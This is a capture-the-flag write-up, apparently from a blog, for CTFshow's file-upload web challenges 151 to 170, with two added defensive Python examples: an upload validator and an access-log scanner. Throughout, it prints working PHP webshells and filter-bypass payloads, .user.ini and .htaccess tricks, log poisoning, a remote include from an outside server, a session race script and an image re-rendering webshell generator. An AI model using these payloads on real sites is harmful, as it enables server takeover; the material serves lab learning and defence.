CTFshow WEB getting started: file upload (continuously updated)

web151

Front-end check only: intercept the request and change the suffix.

web152

Pass directly

web153

php2, php3, php4, php5, phps, pht, phtm, phtml
were all tested and none of them work, so the environment is nginx rather than Apache, which means .htaccess does not work either. Visiting the /upload/ directory shows that the page exists, and after testing, /upload/index.php exists, which suggested uploading a .user.ini.

web154

Testing shows that the suffix is filtered and that the string php is not allowed in the file content. .user.ini is used again, and the content filter is bypassed with PHP's short echo tag <?=, so you can:

web155

Same as above.


------WebKitFormBoundaryUpTShwppxfZXSbY7
Content-Disposition: form-data; name="file"; filename="1.feng"
Content-Type: image/png

GIF89a
<?= eval($_POST[0]);?>
------WebKitFormBoundaryUpTShwppxfZXSbY7--

------WebKitFormBoundaryUpTShwppxfZXSbY7
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

GIF89a
auto_prepend_file="1.feng"
------WebKitFormBoundaryUpTShwppxfZXSbY7--

In addition, Master Yu's WP mentions four kinds of PHP tags; the excerpt is as follows:
1.

<? echo '123';?>

Requires the configuration directive short_open_tag=On.
2.

<?=(expression)?> is equivalent to <?php echo (expression)?>

No configuration change needed.

3.

<% echo '123';%>

Requires the configuration directive asp_tags=On. Testing shows that on PHP 7.0 and above it does not work even after the change is made (a 500 error is returned), while below 7.0 it works once the configuration is modified.
4.

<script language="php">echo '123'; </script>

No configuration change needed, but it only works below PHP 7.0.

So if the version is below PHP 7, there is more room for ideas.
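The filters tested in web153 to web155 (suffix, the string php, .user.ini) and the four tag forms above are all things an upload handler has to reject at once. The following Python check is an added example written for this page; it is not code from the original post or from Master Yu's WP, and the function name check_upload, the extension allowlist and the magic-byte table are assumptions. It rejects dotfile names such as .user.ini, allows exactly one extension from an allowlist, scans the content for every PHP open-tag form listed above regardless of the claimed Content-Type, and requires the real image magic bytes, so that a GIF89a line in front of PHP code is not enough.

```python
import re
from typing import List

# Extension allowlist: only files with exactly one of these suffixes are stored.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}

# Every way PHP can open a code block, taken from the four tag forms listed in
# the writeup: "<?php", the short tag "<?", the short echo tag "<?=",
# ASP-style "<%" (PHP < 7) and "<script language=php>" (PHP < 7).
PHP_TAG_RE = re.compile(
    rb"<\?(?:php|=)?|<%|<script\s+language\s*=\s*[\"']?php",
    re.IGNORECASE,
)

# Expected magic bytes per allowed extension. A GIF89a header on its own
# proves nothing: the payloads in the writeup simply prepend it to PHP code.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}


def check_upload(filename: str, content: bytes) -> List[str]:
    """Return the policy violations for one upload; an empty list means it may be stored."""
    problems = []
    # Keep only the last path component so "../" or "..\" in the name cannot
    # escape the upload directory.
    base = filename.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    # Dotfiles such as .user.ini and .htaccess reconfigure PHP or the web server
    # even though they contain no "php" at all, so they are rejected by name.
    if base.startswith("."):
        problems.append("dotfile names are not allowed")
    parts = base.lower().split(".")
    if len(parts) != 2 or parts[0] == "":
        problems.append("name must be <basename>.<extension> with exactly one extension")
    ext = parts[-1] if len(parts) >= 2 else ""
    if ext not in ALLOWED_EXTENSIONS:
        problems.append("extension is not in the allowlist")
    # Reject any PHP open tag regardless of extension or Content-Type, so that a
    # later .user.ini / .htaccess / include() trick has nothing to execute.
    if PHP_TAG_RE.search(content):
        problems.append("content contains a PHP open tag")
    if ext in MAGIC and not content.startswith(MAGIC[ext]):
        problems.append("content does not start with the magic bytes for ." + ext)
    return problems


if __name__ == "__main__":
    # Constructed inputs mirroring the writeup's payloads (not real captures).
    print(check_upload("1.feng", b"GIF89a\n<?= eval($_POST[0]);?>"))
    print(check_upload(".user.ini", b'GIF89a\nauto_prepend_file="1.feng"'))
    print(check_upload("cat.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16))
```

The short-tag pattern also matches the `<?xml` prologue of an SVG, which is deliberate: with short_open_tag enabled that prologue is itself a PHP open tag, so XML-based image formats need their own, separate handling rather than a place in this allowlist.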

web156

Testing shows that [ and ] are filtered; just use {} to bypass it.

web157

On top of the previous filters, {} and the semicolon are also filtered, so read flag.php directly. Without a semicolon, just end the statement with ?> to close it.


------WebKitFormBoundary949cEK9448VGhzDU
Content-Disposition: form-data; name="file"; filename="1.feng"
Content-Type: image/png

GIF89a
<?= system("cat /var/www/html/fl*")?>
------WebKitFormBoundary949cEK9448VGhzDU--

web158

Same as above

web159

Parentheses are filtered; just use backticks.

web160

Backticks and spaces are banned as well. Thinking of file inclusion, try remote file inclusion: put the webshell on your own server and include it remotely:

GIF89a
<?=include"http://118.***.***.***/feng"?>

The command was executed successfully.

Tried including the log file as well, but found that log is also banned, so that does not work.
But in fact it is possible; I just was not doing it right. You can do it like this:

<?=include"/var/lo"."g/nginx/access.lo"."g"?>

Learn to work around!

web161

This one seems to add an image check; just prepend an image header.

web162

The session file inclusion from earlier is used again; for details see the article on exploiting session.upload_progress for file inclusion and deserialization.
The script is based on Master Yu's; I wrote my own imitation:

import requests
import threading

url="http://4101ed9a-5734-4c58-a661-5697ba7b2325.chall.ctf.show"

# PHP writes this value into the session file while tracking upload progress
data={
    "PHP_SESSION_UPLOAD_PROGRESS":'<?php system("cat /var/www/html/flag.php");?>'
}
# Any file part is enough to trigger upload-progress tracking
files={
    "file":"feng.txt"
}
# Fixed session id, so the session file name is known
cookies={
    "PHPSESSID":"feng"
}

def upload():
    # Keep posting so the session file is created over and over
    global url,data,files,cookies
    while 1:
        requests.post(url=url,data=data,files=files,cookies=cookies)

def getFlag():
    # Race the cleanup: keep requesting the page that includes the session file
    global url
    while 1:
        r=requests.get(url=url+"/upload/index.php").text
        if "flag{" in r or "ctfshow{" in r:
            print(r)

t1=threading.Thread(target=upload,args=())
t2=threading.Thread(target=getFlag,args=())
t1.start()
t2.start()

web163

Same as above, but the race condition succeeds with a particularly low probability... it may also be a problem with my internet speed.

web164

This one tests secondary rendering (the server re-encodes the uploaded image), and I am not good at it yet. It was my first time meeting secondary rendering, so I followed the article Master Yu recommended, "Upload-Labs Pass-16 (secondary rendering bypass): detailed explanation of uploading PNG image webshells". The script is as follows:

<?php
// Pixel values chosen so that, after PNG re-encoding, the raw bytes still spell the webshell
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
    0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
    0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
    0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
    0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
    0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
    0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
    0x66, 0x44, 0x50, 0x33);

$img = imagecreatetruecolor(32, 32);

// Write the bytes three at a time as RGB pixels along the first row
for ($y = 0; $y < sizeof($p); $y += 3) {
    $r = $p[$y];
    $g = $p[$y+1];
    $b = $p[$y+2];
    $color = imagecolorallocate($img, $r, $g, $b);
    imagesetpixel($img, round($y / 3), 0, $color);
}

imagepng($img,'2.png');  // path of the image to write
/* webshell content
<?$_GET[0]($_POST[1]);?>
 */

?>

Generate the image locally with the script, upload it, and then open it through the download page to execute the command:
Seeing download.php?image=, one suspects a file inclusion, which is why the command can execute; otherwise it would not work. The source code confirms that the file is indeed included:

$file= $_GET['image'];

$file = strrev($file);
$ext = strrev(substr($file, 0,4));
if($ext==='.png' && file_exists("./upload/".strrev($file))){
    header('Content-Type:image/png');
    include("./upload/".strrev($file));
}else{
    echo "图片错误";
}

web165

For secondary rendering of jpg images, you can use the jpg script from the article in the previous question, but you need to find a suitable jpg image. I tried thirty or forty images and none worked. I was sick of it and gave up.

web166

Zip upload, but without any checking: just change the suffix of the PHP one-line webshell to zip and upload it.

web167

httpd appears, which points to Apache. Apache brings .htaccess to mind, so upload a .htaccess that makes .jpg parse as PHP:

AddType application/x-httpd-php .jpg

web168

After eval and system are filtered, use backticks:

<?php echo `cat /var/www/html/*`;?>

Looking at Master Yu's WP, he gives a lot of bypass tricks; the ones I learned:

<?php
$a = "s#y#s#t#e#m";
$b = explode("#",$a);
$c = $b[0].$b[1].$b[2].$b[3].$b[4].$b[5];
$c($_REQUEST[1]);
?>

<?php
$a=substr('1s',1).'ystem';
$a($_REQUEST[1]);
?>

<?php
$a=strrev('metsys');
$a($_REQUEST[1]);
?>

<?php
$a=$_REQUEST['a'];
$b=$_REQUEST['b'];
$a($b);
?>

web169

This one was really hard to pass. Burp could not intercept the request at first; it kept saying the type was wrong. After zipping the file it could finally be intercepted, but it still said the type was wrong.
Then change the Content-Type to image/png and PHP can be uploaded normally, but this question filters a lot, so the approach is: upload .user.ini to include the log file, write the webshell into the UA header, and then upload a php file, which does nothing by itself and is only there to work with .user.ini.


------WebKitFormBoundaryO73DVbSX5G6XGfNN
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

auto_prepend_file="/var/log/nginx/access.log"
------WebKitFormBoundaryO73DVbSX5G6XGfNN--

Write the webshell into the UA header, then execute the command.
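The web160 and web169 solutions both rely on the nginx access log: once a request header carrying a PHP open tag has been logged, any include of that log path executes it. From the defender's side the log itself is the earliest place to catch this. The scanner below is an added example written for this page (not code from the original post); the function name scan_access_log is an assumption, the log lines are constructed samples rather than a real capture, and the parser assumes the default nginx "combined" format. It flags every line whose User-Agent or Referer field contains any of the four PHP tag forms listed in web155.

```python
import re
from typing import Dict, List

# nginx "combined" log format:
#   remote_addr - remote_user [time_local] "request" status body_bytes "referer" "user_agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# PHP open tags, the same four forms the writeup lists; any of these in a
# header field that gets logged is the precondition for the log-include trick.
PHP_TAG_RE = re.compile(r"<\?(?:php|=)?|<%|<script\s+language\s*=\s*[\"']?php", re.IGNORECASE)

# Constructed sample lines (not a real capture): one normal visit, two poisoning attempts.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Jan/2021:12:00:01 +0000] "GET /upload/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Jan/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 1024 "-" "<?php system($_GET[0]);?>"',
    '10.0.0.9 - - [10/Jan/2021:12:00:03 +0000] "GET /upload/index.php HTTP/1.1" 200 512 "<?= eval($_POST[0]);?>" "curl/7.68.0"',
]


def scan_access_log(lines) -> List[Dict[str, str]]:
    """Return one finding per log line whose User-Agent or Referer carries a PHP open tag."""
    findings = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess at the fields
        hit_fields = [f for f in ("ua", "referer") if PHP_TAG_RE.search(m.group(f))]
        if hit_fields:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("time"),
                "request": m.group("request"),
                "fields": ",".join(hit_fields),
            })
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG_LINES):
        print(finding)
```

A hit here means the log file is already a valid PHP source, so the finding is worth pairing with a check that the upload directory cannot execute PHP at all (no PHP handler for it in the web server config), since that is what makes the .user.ini auto_prepend_file trick work in the first place.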

web170

Same as above


Origin blog.csdn.net/rfrder/article/details/112894997